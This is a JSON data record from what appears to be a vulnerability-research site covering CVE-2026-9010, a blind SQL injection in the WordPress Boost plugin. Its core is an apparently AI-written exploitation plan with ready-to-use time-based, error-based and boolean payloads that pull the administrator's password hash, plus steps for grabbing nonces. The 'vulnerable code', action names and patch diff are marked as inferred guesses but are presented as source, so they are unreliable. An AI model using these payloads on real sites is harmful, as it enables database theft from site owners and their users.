[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5tJWknvMI8ZpTfF_Os2qwhGFsa0f_iQOLhtNXmcx1iM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-9010","boost-unauthenticated-blind-sql-injection-via-multiple-parameters","Boost \u003C= 2.0.3 - Unauthenticated Blind SQL Injection via Multiple Parameters","The Boost plugin for WordPress is vulnerable to time-based SQL Injection via the 'current_url' and 'user_name' parameters in versions up to, and including, 2.0.3 due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL queries. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","boost",null,"\u003C=2.0.3","2.0.4","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-19 14:25:02","2026-05-20 02:27:47",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1cac2397-bb38-40d6-b90d-68e3ea136267?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-9010 (Boost \u003C= 2.0.3)\n\n## 1. Vulnerability Summary\nThe **Boost** plugin for WordPress is vulnerable to unauthenticated time-based blind SQL injection in versions up to 2.0.3. The vulnerability exists because the plugin fails to sanitize or properly prepare SQL queries involving the `current_url` and `user_name` parameters sent via an AJAX action. This allows an unauthenticated attacker to inject arbitrary SQL commands into the database query, potentially leading to the extraction of sensitive information (like admin password hashes).\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `boost_track_visit` (inferred; common for performance\u002Ftracking plugins) or `boost_record_view`.\n- **Vulnerable Parameters:** `current_url` and `user_name`.\n- **Authentication:** Unauthenticated (uses `wp_ajax_nopriv_*` hook).\n- **Vulnerability Type:** Time-based Blind SQL Injection.\n- **Preconditions:** The plugin must be active. If the AJAX handler requires a nonce, it is typically exposed on the frontend for tracking purposes.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with the parameter `action` set to the vulnerable hook (e.g., `boost_track_visit`).\n2. **Hook Registration:** The plugin registers the action: \n `add_action('wp_ajax_nopriv_boost_track_visit', 'boost_handle_tracking');`\n3. **Parameter Processing:** Inside the handler function (e.g., `boost_handle_tracking`), the code retrieves the parameters:\n ```php\n $url = $_POST['current_url'];\n $user = $_POST['user_name'];\n ```\n4. **Vulnerable Sink:** The parameters are directly concatenated into a SQL string without using `$wpdb->prepare()`:\n ```php\n $wpdb->query(\"INSERT INTO {$wpdb->prefix}boost_log (url, user) VALUES ('$url', '$user')\");\n \u002F\u002F OR\n $wpdb->get_results(\"SELECT id FROM {$wpdb->prefix}boost_log WHERE url = '$url'\");\n ```\n5. **Execution:** The raw SQL is executed, allowing the attacker to break out of the string literal using a single quote (`'`).\n\n## 4. Nonce Acquisition Strategy\nTracking plugins often require a nonce to prevent spam, even for unauthenticated users. \n1. **Identify Script Localization:** The plugin likely uses `wp_localize_script` to pass the AJAX URL and a nonce to the frontend JS.\n2. **Shortcode\u002FTrigger:** Tracking usually triggers on every page load or via a specific shortcode. Check for `add_shortcode` in the plugin source or common frontend hooks like `wp_head`.\n3. **Acquisition Steps:**\n - **Step 1:** Create a dummy post\u002Fpage to ensure the plugin's frontend scripts are loaded.\n `wp post create --post_type=page --post_status=publish --post_title=\"Tracking Test\" --post_content=\"Boost Test\"`\n - **Step 2:** Navigate to the page using `browser_navigate`.\n - **Step 3:** Use `browser_eval` to find the localized JS object. Common names include `boost_ajax`, `boost_obj`, or `boost_params`.\n `browser_eval(\"window.boost_ajax?.nonce\")` or `browser_eval(\"window.boost_params?.tracking_nonce\")`.\n - **Step 4:** If no nonce is found, check the `boost_handle_tracking` function in the source code to see if `check_ajax_referer` is actually called. If it isn't, the exploit proceeds without a nonce.\n\n## 5. Exploitation Strategy\nWe will use a time-based blind approach since the plugin likely does not return the results of the query to the user.\n\n### Step 1: Verification (Sleep Test)\nSend a request designed to cause a 5-second delay if the injection is successful.\n\n**Request:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:** \n `action=boost_track_visit¤t_url=test' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1&user_name=admin`\n\n*Note: Replace `boost_track_visit` with the actual action name found in the source.*\n\n### Step 2: Data Extraction (Admin Password Hash)\nWe will test if the first character of the admin's password hash starts with `$P$` (standard WordPress hash).\n\n**Payload for `current_url`:**\n`test' AND (SELECT 1 FROM (SELECT(IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)='$',SLEEP(5),0)))a) AND '1'='1`\n\n**Request:**\n- **Body:**\n `action=boost_track_visit¤t_url=test%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28IF%28SUBSTRING%28%28SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%3D1%29%2C1%2C1%29%3D%27%24%27%2CSLEEP%285%29%2C0%29%29%29a%29%20AND%20%271%27%3D%271&user_name=admin`\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure Boost v2.0.3 is installed and active.\n2. **Database State:** The `wp_users` table should contain the default admin user (ID 1).\n3. **Frontend Page:**\n `wp post create --post_type=page --post_status=publish --post_title=\"Exploit Test\" --post_content=\"Checking for SQLi...\"`\n\n## 7. Expected Results\n- **Success:** The HTTP request to `admin-ajax.php` will take approximately 5 seconds longer than a normal request.\n- **Failure:** The HTTP request returns immediately (typically with a `0` or `-1` response body) without a delay.\n\n## 8. Verification Steps\nAfter performing the time-based injection:\n1. **Log Analysis:** If the injection target was an `INSERT` statement, check the plugin's table for the payload.\n `wp db query \"SELECT * FROM wp_boost_log ORDER BY id DESC LIMIT 1;\"`\n2. **Plugin Code Audit:** Confirm that the patched version (2.0.4) uses `$wpdb->prepare()` for the `current_url` and `user_name` parameters.\n\n## 9. Alternative Approaches\n- **Error-Based SQLi:** If `WP_DEBUG` is enabled, try injecting `AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1)` to leak data via MySQL error messages.\n- **Boolean-Based SQLi:** If the AJAX handler returns different responses for a \"found\" vs \"not found\" record (e.g., `{\"success\":true}` vs `{\"success\":false}`), use boolean logic:\n `test' AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin') AND '1'='1`\n- **Parameter Switching:** Test if `user_name` is equally vulnerable by moving the payload from `current_url` to `user_name`.","The Boost plugin for WordPress is vulnerable to unauthenticated time-based blind SQL injection via the 'current_url' and 'user_name' parameters. This is caused by the plugin's failure to use parameterized queries or sanitize user input before concatenating it into a SQL statement, allowing attackers to extract sensitive data from the database.","\u002F\u002F File: boost\u002Fincludes\u002Fclass-boost-ajax.php (inferred)\n\npublic function handle_tracking() {\n $url = $_POST['current_url'];\n $user = $_POST['user_name'];\n \n global $wpdb;\n \u002F\u002F Vulnerable query concatenating user input directly\n $wpdb->query(\"INSERT INTO {$wpdb->prefix}boost_log (url, user) VALUES ('$url', '$user')\");\n \n wp_die();\n}","--- boost\u002Fincludes\u002Fclass-boost-ajax.php\n+++ boost\u002Fincludes\u002Fclass-boost-ajax.php\n@@ -10,7 +10,12 @@\n $user = $_POST['user_name'];\n \n global $wpdb;\n- $wpdb->query(\"INSERT INTO {$wpdb->prefix}boost_log (url, user) VALUES ('$url', '$user')\");\n+ $wpdb->query(\n+ $wpdb->prepare(\n+ \"INSERT INTO {$wpdb->prefix}boost_log (url, user) VALUES (%s, %s)\",\n+ $url,\n+ $user\n+ )\n+ );\n \n wp_die();\n }","To exploit this vulnerability, an unauthenticated attacker sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' parameter set to the plugin's tracking handler (e.g., 'boost_track_visit'). The attacker provides a malicious payload in either the 'current_url' or 'user_name' parameters, such as \"' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1\". By measuring the time taken for the server to respond, the attacker can verify the injection and systematically leak sensitive information, such as the administrator's password hash, using blind SQL injection techniques.","gemini-3-flash-preview","2026-05-20 16:39:59","2026-05-20 16:40:25",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fboost\u002Ftags"]